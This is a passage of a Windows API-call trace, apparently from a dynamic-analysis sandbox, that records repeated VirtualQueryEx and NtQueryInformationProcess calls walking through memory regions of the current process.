returned 0x0 [0209.049] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972590000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972590000, AllocationBase=0x7ff972590000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.049] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.049] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9686c0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9686c0000, AllocationBase=0x7ff9686c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.049] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.050] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f90000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971f90000, AllocationBase=0x7ff971f90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.050] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.050] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972bc0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972bc0000, AllocationBase=0x7ff972bc0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.050] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.050] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974520000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974520000, AllocationBase=0x7ff974520000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.050] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.050] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974000000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974000000, AllocationBase=0x7ff974000000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.050] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.051] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973140000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973140000, AllocationBase=0x7ff973140000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.051] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.051] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971b90000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971b90000, AllocationBase=0x7ff971b90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.051] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973110000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973110000, AllocationBase=0x7ff973110000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977720000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977720000, AllocationBase=0x7ff977720000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977200000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977200000, AllocationBase=0x7ff977200000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974720000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974720000, AllocationBase=0x7ff974720000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977b60000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977b60000, AllocationBase=0x7ff977b60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977d40000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977d40000, AllocationBase=0x7ff977d40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974830000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974830000, AllocationBase=0x7ff974830000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9741d0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9741d0000, AllocationBase=0x7ff9741d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9748a0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9748a0000, AllocationBase=0x7ff9748a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973e20000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973e20000, AllocationBase=0x7ff973e20000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974340000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974340000, AllocationBase=0x7ff974340000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff969650000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff969650000, AllocationBase=0x7ff969650000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b770000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96b770000, AllocationBase=0x7ff96b770000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.054] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f790000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f790000, AllocationBase=0x7ff96f790000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.054] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.054] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973000000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973000000, AllocationBase=0x7ff973000000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.054] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.055] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9686a0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9686a0000, AllocationBase=0x7ff9686a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.055] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.055] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e4e0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96e4e0000, AllocationBase=0x7ff96e4e0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.055] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.056] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e3f0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96e3f0000, AllocationBase=0x7ff96e3f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.056] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.056] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96ecc0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96ecc0000, AllocationBase=0x7ff96ecc0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.056] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.056] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9685b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9685b0000, AllocationBase=0x7ff9685b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.056] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.056] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9684e0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9684e0000, AllocationBase=0x7ff9684e0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.057] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.057] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96fca0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96fca0000, AllocationBase=0x7ff96fca0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.057] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.057] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973070000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973070000, AllocationBase=0x7ff973070000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.057] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.057] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b4f0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96b4f0000, AllocationBase=0x7ff96b4f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.057] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.058] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968470000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff968470000, AllocationBase=0x7ff968470000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.058] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.059] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9739b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9739b0000, AllocationBase=0x7ff9739b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.059] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.059] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9713b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9713b0000, AllocationBase=0x7ff9713b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.059] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.059] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973450000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973450000, AllocationBase=0x7ff973450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.059] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.059] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9755b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9755b0000, AllocationBase=0x7ff9755b0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.059] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.060] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968400000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff968400000, AllocationBase=0x7ff968400000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.060] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.060] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9683b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9683b0000, AllocationBase=0x7ff9683b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.060] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.061] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e690000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96e690000, AllocationBase=0x7ff96e690000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.061] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.061] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973210000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973210000, AllocationBase=0x7ff973210000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.061] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.062] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f920000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f920000, AllocationBase=0x7ff96f920000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.062] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.062] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971a40000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971a40000, AllocationBase=0x7ff971a40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.063] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.063] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971310000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971310000, AllocationBase=0x7ff971310000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.063] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.063] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972b60000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff972b60000, AllocationBase=0x7ff972b60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.063] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.064] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968360000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff968360000, AllocationBase=0x7ff968360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.064] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.064] VirtualQueryEx (in: 